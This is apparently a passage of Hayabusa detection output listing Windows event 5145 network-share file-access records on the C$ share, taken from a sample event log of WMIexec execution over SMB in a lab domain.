0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.081 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W2d6979e4#\b77a61cdfca8e3f67916586b89eb6df5 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.097 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W2ded559f# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.097 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W2ded559f#\2cbdedd1fc5676a39a1fb1b534f48d02 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.097 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: 
\\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W3cdb5602# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.113 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W3cdb5602#\e3e82e97635cdd0d33dd1fb39ffe5b5f | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.113 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W6c95e797# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.113 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W6c95e797#\4bdb448dffd981eb795d0efeaf81aee9 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via 
SMB.evtx +2021-04-22 20:32:30.113 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W6dcfceb1# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.128 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W6dcfceb1#\bbfc6bc472afc457c523dc2738248629 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.128 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W7b7c0837# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.128 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W7b7c0837#\294124bd4523f5af19788c4942aeba5e | IP Addr: 10.23.23.9 | LID: 
0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.128 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W9e7db7c5# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.128 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W9e7db7c5#\e9ab45e2a1806140421e99300db14933 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.144 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W9e8926d3# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.144 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: 
Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W9e8926d3#\278d9be2765837ed33460677146f35e8 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.144 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W15cd0137# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.144 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W15cd0137#\82f3f76602a3738000b03df08a71ffe8 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.144 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W37d1a032# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.144 
+09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W37d1a032#\d3293b74965baef61a05323c7ec98d92 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.160 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W39c436dd# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.160 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W39c436dd#\711dbd144f8f71a864ea8493a3877bc5 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.160 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W69ef49d2# | IP Addr: 10.23.23.9 | LID: 
0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.160 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W69ef49d2#\28242ebb69175640e01f44f44845482c | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.191 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W71daf281# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.207 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W71daf281#\be26a3df8bcf20be912896fba8462d2f | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.207 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: 
\\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W81a3882f# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.207 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W81a3882f#\84ae811d9df57eca1c9728263a6e6aff | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.207 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.207 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: USERS | IP Addr: 10.23.23.9 | LID: 0x18b247,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.207 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: 
\??\C:\ | Path: Users\Default\desktop.ini | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.207 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users | IP Addr: 10.23.23.9 | LID: 0x18b247,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.207 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users | IP Addr: 10.23.23.9 | LID: 0x18b247,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.207 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\Public\desktop.ini | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.222 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W708fc392# | IP Addr: 10.23.23.9 | LID: 
0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.222 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W708fc392#\4f9e41de8acf7fe60bc43242811fbabd | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.222 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W5052cbb1# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.222 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W5052cbb1#\960951a3fe97e1a2bd2d09ced71ce4f3 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.222 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: 
\\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W57798b05# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.222 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W57798b05#\2145d62276d37b22799a8deb8d44b210 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.238 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W73044bb5# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.238 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W73044bb5#\fb97af1f4b1eed42372eea20ba746a53 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via 
SMB.evtx +2021-04-22 20:32:30.238 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W193497eb# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.238 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W193497eb#\a26561bad24a68eb0217aa9d9fdad386 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.238 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W08054466# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.238 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W08054466#\50e266485611719e095733dd021e3a42 | IP Addr: 10.23.23.9 | LID: 
0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.238 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Wad38fd8b# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.238 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Wad38fd8b#\44e2747436ee8621f4daf918b1922498 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.253 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Wad78daf4# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.253 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: 
Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Wad78daf4#\748bf388335b4acc7031af4d134ad037 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.253 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Wb2d030b7# | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.253 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Wb2d030b7#\7dbfc45fb55f5cf738956f4c7b2f8639 | IP Addr: 10.23.23.9 | LID: 0x18acdd,../hayabusa-rules/hayabusa/non-default/events/Security/NetworkShareAccess/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.253 +09:00,fs03vuln.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share 